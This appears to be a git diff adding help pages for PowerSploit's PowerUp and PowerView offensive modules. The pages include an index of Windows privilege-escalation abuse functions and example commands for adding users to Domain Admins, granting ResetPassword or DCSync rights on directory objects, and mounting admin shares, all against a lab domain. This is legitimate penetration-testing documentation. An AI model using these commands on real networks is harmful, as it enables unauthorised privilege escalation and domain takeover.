+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: "$(Convert-Path .)\service.exe"
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.ServiceBinary
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Write-UserAddMSI.md b/docs/Privesc/Write-UserAddMSI.md new file mode 100755 index 0000000..cac959d --- /dev/null +++ b/docs/Privesc/Write-UserAddMSI.md @@ -0,0 +1,56 @@ +# Write-UserAddMSI
+
+## SYNOPSIS
+Writes out a precompiled MSI installer that prompts for a user/group addition.
+This function can be used to abuse Get-RegistryAlwaysInstallElevated.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Write-UserAddMSI [[-Path] <String>]
+```
+
+## DESCRIPTION
+Writes out a precompiled MSI installer that prompts for a user/group addition.
+This function can be used to abuse Get-RegistryAlwaysInstallElevated.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Write-UserAddMSI
+```
+
+Writes the user add MSI to the local directory.
+
+## PARAMETERS
+
+### -Path
+{{Fill Path Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServiceName
+
+Required: False
+Position: 1
+Default value: UserAdd.msi
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.UserAddMSI
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/index.md b/docs/Privesc/index.md new file mode 100644 index 0000000..836e674 --- /dev/null +++ b/docs/Privesc/index.md @@ -0,0 +1,55 @@ +## PowerUp + +PowerUp aims to be a clearinghouse of common Windows privilege escalation +vectors that rely on misconfigurations. + +Running Invoke-AllChecks will output any identifiable vulnerabilities along +with specifications for any abuse functions. The -HTMLReport flag will also +generate a COMPUTER.username.html version of the report. + +Author: @harmj0y +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + + +### Token/Privilege Enumeration/Abuse: + Get-ProcessTokenGroup - returns all SIDs that the current token context is a part of, whether they are disabled or not + Get-ProcessTokenPrivilege - returns all privileges for the current (or specified) process ID + Enable-Privilege - enables a specific privilege for the current process + +### Service Enumeration/Abuse: + Test-ServiceDaclPermission - tests one or more passed services or service names against a given permission set + Get-UnquotedService - returns services with unquoted paths that also have a space in the name + Get-ModifiableServiceFile - returns services where the current user can write to the service binary path or its config + Get-ModifiableService - returns services the current user can modify + Get-ServiceDetail - returns detailed information about a specified service + Set-ServiceBinaryPath - sets the binary path for a service to a specified value + Invoke-ServiceAbuse - modifies a vulnerable service to create a local admin or execute a custom command + Write-ServiceBinary - writes out a patched C# service binary that adds a local admin or executes a custom command + Install-ServiceBinary - replaces a service binary with one that adds a local admin or executes a custom command + Restore-ServiceBinary - restores a replaced service binary with the original executable + +### DLL Hijacking: + Find-ProcessDLLHijack - finds potential DLL hijacking opportunities for currently running processes + Find-PathDLLHijack - finds service %PATH% DLL hijacking opportunities + Write-HijackDll - writes out a hijackable DLL + +### Registry Checks: + Get-RegistryAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set + Get-RegistryAutoLogon - checks for Autologon credentials in the registry + Get-ModifiableRegistryAutoRun - checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns + +### Miscellaneous Checks: + Get-ModifiableScheduledTaskFile - find schtasks with modifiable target files + Get-UnattendedInstallFile - finds remaining unattended installation files + Get-Webconfig - checks for any encrypted web.config strings + Get-ApplicationHost - checks for encrypted application pool and virtual directory passwords + Get-SiteListPassword - retrieves the plaintext passwords for any found McAfee's SiteList.xml files + Get-CachedGPPPassword - checks for passwords in cached Group Policy Preferences files + +### Other Helpers/Meta-Functions: + Get-ModifiablePath - tokenizes an input string and returns the files in it the current user can modify + Write-UserAddMSI - write out a MSI installer that prompts for a user to be added + Invoke-WScriptUACBypass - performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe + Invoke-PrivescAudit - runs all current escalation checks and returns a report (formerly Invoke-AllChecks) diff --git a/docs/Recon/Add-DomainGroupMember.md b/docs/Recon/Add-DomainGroupMember.md new file mode 100755 index 0000000..cc563e9 --- /dev/null +++ b/docs/Recon/Add-DomainGroupMember.md @@ -0,0 +1,142 @@ +# Add-DomainGroupMember
+
+## SYNOPSIS
+Adds a domain user (or group) to an existing domain group, assuming
+appropriate permissions to do so.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-PrincipalContext
+
+## SYNTAX
+
+```
+Add-DomainGroupMember [-Identity] <String> -Members <String[]> [-Domain <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to search for the specified -GroupIdentity,
+which returns a DirectoryServices.AccountManagement.GroupPrincipal object.
+For
+each entry in -Members, each member identity is similarly searched for and added
+to the group.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'
+```
+
+Adds harmj0y to 'Domain Admins' in the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred
+
+Adds harmj0y to 'Domain Admins' in the current domain using the alternate credentials.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred
+
+Creates the 'andy' user with the specified description and password, using the specified
+alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember
+and the alternate credentials.
+
+## PARAMETERS
+
+### -Identity
+A group SamAccountName (e.g.
+Group1), DistinguishedName (e.g.
+CN=group1,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
+specifying the group to add members to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: GroupName, GroupIdentity
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Members
+One or more member identities, i.e.
+SamAccountName (e.g.
+Group1), DistinguishedName
+(e.g.
+CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1114),
+or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202).
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: MemberIdentity, Member, DistinguishedName
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/)
+
diff --git a/docs/Recon/Add-DomainObjectAcl.md b/docs/Recon/Add-DomainObjectAcl.md new file mode 100755 index 0000000..c530e81 --- /dev/null +++ b/docs/Recon/Add-DomainObjectAcl.md @@ -0,0 +1,361 @@ +# Add-DomainObjectAcl
+
+## SYNOPSIS
+Adds an ACL for a specific active directory object.
+
+AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3): https://adsecurity.org/?p=1906
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject
+
+## SYNTAX
+
+```
+Add-DomainObjectAcl [[-TargetIdentity] <String[]>] [-TargetDomain <String>] [-TargetLDAPFilter <String>]
+ [-TargetSearchBase <String>] -PrincipalIdentity <String[]> [-PrincipalDomain <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]
+ [-Credential <PSCredential>] [-Rights <String>] [-RightsGUID <Guid>]
+```
+
+## DESCRIPTION
+This function modifies the ACL/ACE entries for a given Active Directory
+target object specified by -TargetIdentity.
+Available -Rights are
+'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended
+rights GUID can be set with -RightsGUID.
+These rights are granted on the target
+object for the specified -PrincipalIdentity.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid
+```
+
+Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}
+
+...
+
+Add-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string:(&(|(samAccountName=dfm.a)))
+VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=dfm (admin),CN=Users,DC=testlab,DC=local
+VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=dfm (admin),CN=Users,DC=testlab,DC=local
+
+Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }
+
+AceQualifier : AccessAllowed
+ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local
+ActiveDirectoryRights : ExtendedRight
+ObjectAceType : User-Force-Change-Password
+ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114
+InheritanceFlags : None
+BinaryLength : 56
+AceType : AccessAllowedObject
+ObjectAceFlags : ObjectAceTypePresent
+IsCallback : False
+PropagationFlags : None
+SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108
+AccessMask : 256
+AuditFlags : None
+IsInherited : False
+AceFlags : None
+InheritedObjectAceType : All
+OpaqueLength : 0
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid
+```
+
+Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}
+
+\[no results returned\]
+
+$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Add-DomainObjectAcl -TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose
+VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain
+VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=harmj0y)(name=harmj0y))))
+VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain
+VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))
+VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=testuser testuser,CN=Users,DC=testlab,DC=local
+VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=testuser,CN=Users,DC=testlab,DC=local
+
+Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }
+
+AceQualifier : AccessAllowed
+ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local
+ActiveDirectoryRights : ExtendedRight
+ObjectAceType : User-Force-Change-Password
+ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114
+InheritanceFlags : None
+BinaryLength : 56
+AceType : AccessAllowedObject
+ObjectAceFlags : ObjectAceTypePresent
+IsCallback : False
+PropagationFlags : None
+SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108
+AccessMask : 256
+AuditFlags : None
+IsInherited : False
+AceFlags : None
+InheritedObjectAceType : All
+OpaqueLength : 0
+
+## PARAMETERS
+
+### -TargetIdentity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the domain object to modify ACLs for.
+Required.
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -TargetDomain
+Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -TargetLDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory object targets.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -TargetSearchBase
+The LDAP source to search through for targets, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PrincipalIdentity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the domain principal to add for the ACL.
+Required.
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PrincipalDomain
+Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Rights
+Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'.
+Defaults to 'All'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: All
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RightsGUID
+Manual GUID representing the right to add to the target.
+
+```yaml
+Type: Guid
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[https://adsecurity.org/?p=1906
+https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell](https://adsecurity.org/?p=1906
+https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell)
+
diff --git a/docs/Recon/Add-RemoteConnection.md b/docs/Recon/Add-RemoteConnection.md new file mode 100755 index 0000000..86112e2 --- /dev/null +++ b/docs/Recon/Add-RemoteConnection.md @@ -0,0 +1,114 @@ +# Add-RemoteConnection
+
+## SYNOPSIS
+Pseudo "mounts" a connection to a remote path using the specified
+credential object, allowing for access of remote resources.
+If a -Path isn't
+specified, a -ComputerName is required to pseudo-mount IPC$.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+### ComputerName (Default)
+```
+Add-RemoteConnection [-ComputerName] <String[]> -Credential <PSCredential>
+```
+
+### Path
+```
+Add-RemoteConnection [-Path] <String[]> -Credential <PSCredential>
+```
+
+## DESCRIPTION
+This function uses WNetAddConnection2W to make a 'temporary' (i.e.
+not saved) connection
+to the specified remote -Path (\\\\UNC\share) with the alternate credentials specified in the
+-Credential object.
+If a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC$.
+
+To destroy the connection, use Remove-RemoteConnection with the same specified \\\\UNC\share path
+or -ComputerName.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$Cred = Get-Credential
+```
+
+Add-RemoteConnection -ComputerName 'PRIMARY.testlab.local' -Credential $Cred
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Add-RemoteConnection -Path '\\\\PRIMARY.testlab.local\C$\' -Credential $Cred
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$Cred = Get-Credential
+```
+
+@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Add-RemoteConnection -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the system to add a \\\\ComputerName\IPC$ connection for.
+
+```yaml
+Type: String[]
+Parameter Sets: ComputerName
+Aliases: HostName, dnshostname, name
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Path
+Specifies the remote \\\\UNC\path to add the connection for.
+
+```yaml
+Type: String[]
+Parameter Sets: Path
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Convert-ADName.md b/docs/Recon/Convert-ADName.md new file mode 100755 index 0000000..7f9f42b --- /dev/null +++ b/docs/Recon/Convert-ADName.md @@ -0,0 +1,184 @@ +# Convert-ADName
+
+## SYNOPSIS
+Converts Active Directory object names between a variety of formats.
+
+Author: Bill Stewart, Pasquale Lantella
+Modifications: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Convert-ADName [-Identity] <String[]> [[-OutputType] <String>] [[-Domain] <String>] [[-Server] <String>]
+ [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+This function is heavily based on Bill Stewart's code and Pasquale Lantella's code (in LINK)
+and translates Active Directory names between various formats using the NameTranslate COM object.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Convert-ADName -Identity "TESTLAB\harmj0y"
+```
+
+harmj0y@testlab.local
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+"TESTLAB\krbtgt", "CN=Administrator,CN=Users,DC=testlab,DC=local" | Convert-ADName -OutputType Canonical
+```
+
+testlab.local/Users/krbtgt
+testlab.local/Users/Administrator
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Convert-ADName -OutputType dn -Identity 'TESTLAB\harmj0y' -Server PRIMARY.testlab.local
+```
+
+CN=harmj0y,CN=Users,DC=testlab,DC=local
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
+'S-1-5-21-890171859-3433809279-3366196753-1108' | Convert-ADNAme -Credential $Cred
+
+TESTLAB\harmj0y
+
+## PARAMETERS
+
+### -Identity
+Specifies the Active Directory object name to translate, of the following form:
+
+ DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'
+ Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'
+ NT4 domain\username; e.g., 'fabrikam\pflynn'
+ Display display name, e.g.
+'pflynn'
+ DomainSimple simple domain name format, e.g.
+'pflynn@fabrikam.com'
+ EnterpriseSimple simple enterprise name format, e.g.
+'pflynn@fabrikam.com'
+ GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'
+ UPN user principal name; e.g., 'pflynn@fabrikam.com'
+ CanonicalEx extended canonical name format
+ SPN service principal name format; e.g.
+'HTTP/kairomac.contoso.com'
+ SID Security Identifier; e.g., 'S-1-5-21-12986231-600641547-709122288-57999'
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Name, ObjectName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -OutputType
+Specifies the output name type you want to convert to, which must be one of the following:
+
+ DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'
+ Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'
+ NT4 domain\username; e.g., 'fabrikam\pflynn'
+ Display display name, e.g.
+'pflynn'
+ DomainSimple simple domain name format, e.g.
+'pflynn@fabrikam.com'
+ EnterpriseSimple simple enterprise name format, e.g.
+'pflynn@fabrikam.com'
+ GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'
+ UPN user principal name; e.g., 'pflynn@fabrikam.com'
+ CanonicalEx extended canonical name format, e.g.
+'fabrikam.com/Users/Phineas Flynn'
+ SPN service principal name format; e.g.
+'HTTP/kairomac.contoso.com'
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the translation, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to for the translation.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 4
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+Specifies an alternate credential to use for the translation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more objects name strings on the pipeline.
+
+## OUTPUTS
+
+### String
+
+Outputs a string representing the converted name.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
+https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67](http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
+https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67)
+
diff --git a/docs/Recon/ConvertFrom-SID.md b/docs/Recon/ConvertFrom-SID.md new file mode 100755 index 0000000..186e19b --- /dev/null +++ b/docs/Recon/ConvertFrom-SID.md @@ -0,0 +1,126 @@ +# ConvertFrom-SID
+
+## SYNOPSIS
+Converts a security identifier (SID) to a group/user name.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Convert-ADName
+
+## SYNTAX
+
+```
+ConvertFrom-SID [-ObjectSid] <String[]> [[-Domain] <String>] [[-Server] <String>]
+ [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+Converts a security identifier string (SID) to a group/user name
+using Convert-ADName.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108
+```
+
+TESTLAB\harmj0y
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+"S-1-5-21-890171859-3433809279-3366196753-1107", "S-1-5-21-890171859-3433809279-3366196753-1108", "S-1-5-32-562" | ConvertFrom-SID
+```
+
+TESTLAB\WINDOWS2$
+TESTLAB\harmj0y
+BUILTIN\Distributed COM Users
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
+ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 -Credential $Cred
+
+TESTLAB\harmj0y
+
+## PARAMETERS
+
+### -ObjectSid
+Specifies one or more SIDs to convert.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: SID
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the translation, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to for the translation.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+Specifies an alternate credential to use for the translation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more SID strings on the pipeline.
+
+## OUTPUTS
+
+### String
+
+The converted DOMAIN\username.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/ConvertFrom-UACValue.md b/docs/Recon/ConvertFrom-UACValue.md new file mode 100755 index 0000000..c75f942 --- /dev/null +++ b/docs/Recon/ConvertFrom-UACValue.md @@ -0,0 +1,127 @@ +# ConvertFrom-UACValue
+
+## SYNOPSIS
+Converts a UAC int value to human readable form.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
